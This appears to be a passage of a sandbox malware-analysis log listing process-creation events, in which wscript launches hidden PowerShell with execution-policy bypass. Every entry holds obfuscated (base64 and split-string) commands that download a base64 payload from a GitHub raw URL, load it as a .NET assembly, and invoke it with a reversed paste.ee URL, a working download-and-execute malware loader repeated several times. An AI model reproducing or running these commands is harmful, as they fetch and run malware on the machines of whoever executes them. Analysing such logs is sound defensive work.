AbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLACcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAAJwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Fromba Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLACcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAAJwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Fromba
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden 